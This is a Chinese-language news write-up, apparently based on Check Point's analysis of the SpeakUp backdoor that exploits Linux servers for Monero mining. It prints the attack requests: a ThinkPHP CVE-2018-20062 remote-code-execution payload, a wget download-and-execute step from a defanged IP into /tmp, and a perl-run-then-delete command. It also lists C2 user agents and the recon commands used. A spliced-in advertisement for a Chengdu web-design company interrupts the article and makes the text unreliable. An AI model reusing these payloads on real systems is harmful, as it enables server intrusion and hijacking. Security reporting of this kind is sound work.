日前,全球屈指一首的Internet安全解决方案供应商Check Point IT安全部门研究人员发现了一个通过目前Linux服务器漏洞植入后门木马的黑客活动,此次攻击的目标涵盖了包括AWS主机在内的世界范围的全部服务器。攻击范围涵盖了共6个不同Linux发行版和macOS系统服务器中的已知漏洞,目前黑客的主要攻击目标集中在东亚与拉美地区的Linux服务器。
成都创新互联是一家集网站建设,昌邑企业网站建设,昌邑品牌网站建设,网站定制,昌邑网站建设报价,网络营销,网络优化,昌邑网站推广为一体的创新建站企业,帮助传统企业提升企业形象加强企业竞争力。可充分满足这一群体相比中小企业更为丰富、高端、多元的互联网需求。同时我们时刻保持专业、时尚、前沿,时刻以成就客户成长自我,坚持不断学习、思考、沉淀、净化自己,让我们为更多的企业打造出实用型网站。
全球SpeakUP“受害者”分部
这次的恶意攻击的罪魁祸首被命名为SpeakUP,命名方式是以其中一台命令与控制(C2)服务器名称进行命名的。据悉Check Point的研究人员发现SpeakUP通过Linux服务器漏洞来植入后门木马的攻击方式可以绕过目前所有安全产品,这是由于该恶意软件中存储了大量此前出现过的攻击案例,致使SpeakUP可以优先识别目前存在的安全漏洞,并成功绕过几乎所有的杀毒软件的“双眼”。
SpeakUP样本采集
在Check Point的分析报告中显示,首次发现的SpeakUP样本是今年1月14日在我国的服务器上发现的,该样本曾在1月9日被上传至VirusTotal网站(专业的免费可疑文件分析服务网站)。但经过严密的监测后发现,没有一家安全产品将SpeakUP恶意软件标为恶意。
这是因为为了逃避安全检测,SpeakUp的代码采用了base64加盐算法加密。不仅如此,C2通信也是采用了相同的方式加密。这也是为什么VirusTotal上的杀毒引擎无法将其检测为恶意的原因所在。
SpeakUP感染全过程:
植入脚本阶段
根据Check Point报告中披露的数据来看,SpeakUP首先是利用ThinkPHP(轻量级PHP开发框架)的一个漏洞为攻击起点,从中植入一个PHP shell脚本。
使用GET请求(如下所示),通过ThinkPHP远程代码执行漏洞CVE-2018-20062将shell脚本发送到目标服务器:
s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^ >index.php
这个shell脚本接下来会通过query中的“module”参数来执行命令。
植入后门阶段
在脚本生效之后,SpeakUP将进行像服务器植入后门的操作
发送另一个HTTP请求(如下所示)到目标服务器:
/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
实际上,这是一个注入过程,目的是植入ibus payload并将其存储到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc
启动后门并抹除痕迹阶段
在植入后门成功后,SpeakUP将对服务器发送请求,启动后门,在启动后门后SpeakUP将通过删除文件来清楚自己的感染痕迹。
使用如下HTTP请求来执行后门:
/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc
SpeakUP感染后果:
在Linux服务器被感染后,SpeakUP使用POST和GET请求来与C2通信,C2是被黑的speakupomaha[.]com.。
第一个post请求会发送受害者ID和其他介绍性的信息,比如安装的脚本的当前版本等。
对应的C2响应是needrgr,表示受感染的受害者之前未在服务器上注册,需要注册。
之后,木马会通过执行以下的Linux命令来POST机器的全部信息:
· Uname (-r, -v, -m, -n,-a, -s)
· Whoami
· Ifconfig –a
· Arp –a
· cat /proc/cpuinfo | grep -c “cpu family” 2>&1
· who –b
一旦受感染服务器注册完成,C2服务器就会发送新的任务——不同的C2服务器会命名受感染服务器来下载和执行不同的文件。
有一个需要注意的点是,SpeakUP使用了User-Agent用户代理。具体来说,SpeakUp定义了三个用户代理,而受感染服务器在与C2服务器进行通信时必须使用这些代理。其中两个代理是MacOS X User-Agent,第三个是经过哈希处理的字符串:
Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
E9BC3BD76216AFA560BFB5ACAF5731A3
目前,SpeakUp主要服务于XMRig矿工,为其提供“肉鸡(受感染服务器)”。根据XMRHunter网站的查询结果显示,攻击者的钱包目前拥有约107枚门罗币。
SpeakUP强大的自我传播能力
攻击者还为SpeakUp配备了一个“i”模块,它实际上是一个python脚本,使得SpeakUP能够扫描和感染位于受感染服务器所处内网和外网的其他更多的Linux服务器。其主要功能有:
使用预定义的用户名和密码来暴力破解尝试登陆管理面板;
扫描受感染服务器的网络环境,检测共享相同内部和外部子网掩码的服务器上的特定端口的可用性;
尝试利用目标服务器上的远程代码执行漏洞
